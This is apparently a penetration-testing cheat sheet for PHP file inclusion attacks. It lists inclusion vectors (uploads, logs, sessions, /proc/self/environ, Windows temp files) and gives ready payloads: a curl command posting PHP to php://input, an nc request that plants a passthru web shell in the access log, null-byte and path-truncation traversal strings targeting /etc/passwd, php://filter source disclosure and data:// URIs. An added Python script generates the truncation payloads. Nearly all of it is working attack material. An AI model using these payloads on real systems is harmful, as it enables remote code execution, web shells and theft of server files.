  • including uploaded files
  • include data:// or php://input, php://filter pseudo protocols (data:// and php://input need allow_url_include=On; php://filter is a local read and works regardless)
  • including logs (web server access/error log, but also mail, FTP or SSH logs you can write to)
  • including /proc/self/environ (mainly CGI setups, where request headers such as User-Agent land in the process environment as HTTP_USER_AGENT)
  • include session files - usually /tmp/sess_<PHPSESSID>; the content is whatever the app stored in $_SESSION, so any persisted user input can carry the payload
  • include other files created by PHP application (cache, compiled templates, uploaded temp files)
  • Windows: uploads are spooled to C:\Windows\Temp\php<16-bit-random>.TMP only for the duration of the request; no bruteforce of the name is needed because `<` acts as a `*` wildcard in Windows filename lookups, so inc=C:\Windows\Temp\php<< matches the temp file (upload and include in the same request)

Path Traversal



RCE with TXT upload

Upload a .txt (or whatever extension the upload filter lets through, e.g. evil.txt or evil.txt.php) that contains PHP code, then point the vulnerable include at it: include() parses whatever it reads as PHP, the file extension is irrelevant.

allow_url_include=Off (the default) blocks remote includes over http://, ftp:// and also php://input and data://; allow_url_fopen=Off additionally blocks URL wrappers for fopen()/file_get_contents(). Neither setting stops inclusion of local files, so every vector that gets a payload onto disk (uploads, logs, sessions, /proc) still works.

RCE with Logs

  • Use nc to write the malicious content into access_log: a raw connection sends the PHP tags unencoded, whereas a browser or curl would URL-encode them and the include would then see %3C?php instead of <?php.
  • Connect and just send the attack string in the request line or in a header the server logs (User-Agent, Referer, etc.).
  • Then include the log file via the LFI (e.g. /var/log/apache2/access.log or /var/log/httpd/access_log; the path depends on the distro) and pass the command in the parameter your payload reads.

RCE over SQLi

Make the injected query return the string <?php echo "test"?> and look at where that output ends up: if a page later include()s or eval()s it (or you can SELECT ... INTO OUTFILE into the document root), the literal "test" shows up instead of the raw tags, and RCE over the SQLi is possible.


PHP Wrappers

  • Payload in the POST body via php://input (needs allow_url_include=On)
    • curl -s --data "<?system('ls -la');?>" "http://target.host/web.php?file_path=php://input%00"
      (the %00 cuts off an appended extension and only works on PHP < 5.3.4; <? needs short_open_tag=On, so prefer <?php)
  • Read PHP source instead of executing it: php://filter base64-encodes the file, so the include returns the source as a base64 blob
    • http://X.X.X.X/?page=php://filter/convert.base64-encode/resource=(PHP FILE NAME NO EXTENSION)
      (leave off .php when the script appends the extension itself; decode the blob locally)



/proc/self/fd/XX: when the log path is unknown, include /proc/self/fd/<N> and brute-force small descriptor numbers; the web server keeps its log files open, so one of the descriptors is the poisoned access or error log. Write-up: http://pastebin.com/raw.php?i=cRYvK4jb

Null Byte Injection (PHP < 5.3.4 only; the null terminates the C string so an appended ".php" never reaches open()):
?file=../../../../../../../../../etc/passwd%00
Directory Listing with Null Byte Injection (reported on some older PHP builds): a null-terminated directory path, e.g. ?file=../../../../var/www/%00, returns a listing of the directory instead of an error
Path Truncation (Linux): PHP normalises the path in a MAXPATHLEN (4096 byte) buffer, so padding the input with no-op path components pushes the appended extension past the limit and it is dropped
?file=../../../../../../../../../etc/passwd.\.\.\.\.\.\.\.\.\.\.\ ...
Dot Truncation (Windows only): trailing dots are stripped from filenames, so padding with dots up to the limit drops the extension the same way, e.g. ?file=../../../../boot.ini.........
Reverse Path Truncation: the padding goes in front as repeated ../ sequences (the [] stands for many repetitions; beyond the root they resolve to nothing), so the target itself is never the part that gets cut
?file=../../../../ [] ../../../../../etc/passwd
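Worked example, added here and not part of the original notes: payload builders for the null byte and truncation tricks above, plus a toy model of what reaches open() after the script prepends its directory and appends ".php". The model is an assumption that mirrors the described behaviour (cut the string at MAXPATHLEN, then collapse "." and ".." lexically), not PHP's own code; the docroot `/var/www/html/` and the appended `.php` are assumptions.

```python
MAXPATHLEN = 4096  # Linux size of the buffer PHP normalises paths in


def null_byte(path):
    """PHP < 5.3.4 only: %00 ends the C string, so an appended '.php' never reaches open()."""
    return path + "%00"


def path_truncate(target, depth=9, pad="/.", maxlen=MAXPATHLEN):
    """Linux variant: '/.' is a no-op path component, so padding with it keeps the
    target intact while pushing whatever the script appends past MAXPATHLEN."""
    base = "../" * depth + target.lstrip("/")
    reps = (maxlen - len(base)) // len(pad) + 1  # overshoot the limit by one pad unit
    return base + pad * reps


def dot_truncate(target, depth=9, maxlen=MAXPATHLEN):
    """Windows variant: the filesystem strips trailing dots, so dots pad the path
    up to the limit and then vanish."""
    base = "../" * depth + target.lstrip("/")
    return base + "." * (maxlen - len(base) + 1)


def model_include_path(user_input, docroot="/var/www/html/", suffix=".php",
                       maxlen=MAXPATHLEN):
    """Toy model (assumption, not PHP's code) of the path the include opens:
    concatenate docroot + input + suffix, cut at maxlen, then normalise '.' and '..'.
    Models the Linux behaviour only; it does not strip trailing dots."""
    raw = (docroot + user_input + suffix)[:maxlen]
    parts = []
    for comp in raw.split("/"):
        if comp in ("", "."):
            continue            # empty and '.' components are no-ops
        if comp == "..":
            if parts:
                parts.pop()     # '..' above the root stays at the root
            continue
        parts.append(comp)
    return "/" + "/".join(parts)


if __name__ == "__main__":
    plain = "../../../etc/passwd"
    padded = path_truncate("/etc/passwd")
    print(len(padded), "chars ->", model_include_path(padded))   # suffix gone
    print(len(plain), "chars ->", model_include_path(plain))     # suffix kept
    print(null_byte(plain))
    print(len(dot_truncate("/boot.ini")), "chars (Windows only)")
```

The contrast between the two `model_include_path` calls is the whole trick: the short input comes back as `/etc/passwd.php`, the padded one as `/etc/passwd`, because the cut at 4096 bytes lands inside the `/.` padding and the remaining padding collapses to nothing.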

Log poisoning by hand (the payload goes raw into the request line so it is logged unencoded; finish with two empty lines to end the request):
nc <IP> <port>
GET /<?php passthru($_GET['cmd']); ?> HTTP/1.1
Host: <IP>
Connection: close

then include the log through the LFI: ?file=<path to access log>&cmd=id

Including Remote Code (all of these need allow_url_include=On, except php://filter, which is a local read):
Using PHP stream php://input:
Specify your payload in the POST body; the include target is php://input, so the body itself is executed as PHP.
Using PHP stream php://filter:
Returns the file through a filter instead of executing it, e.g. convert.base64-encode to read PHP source that would otherwise run.
Using data URIs:
data://text/plain;base64,<base64 of PHP code> or data://text/plain,<PHP code> puts the code straight into the URL.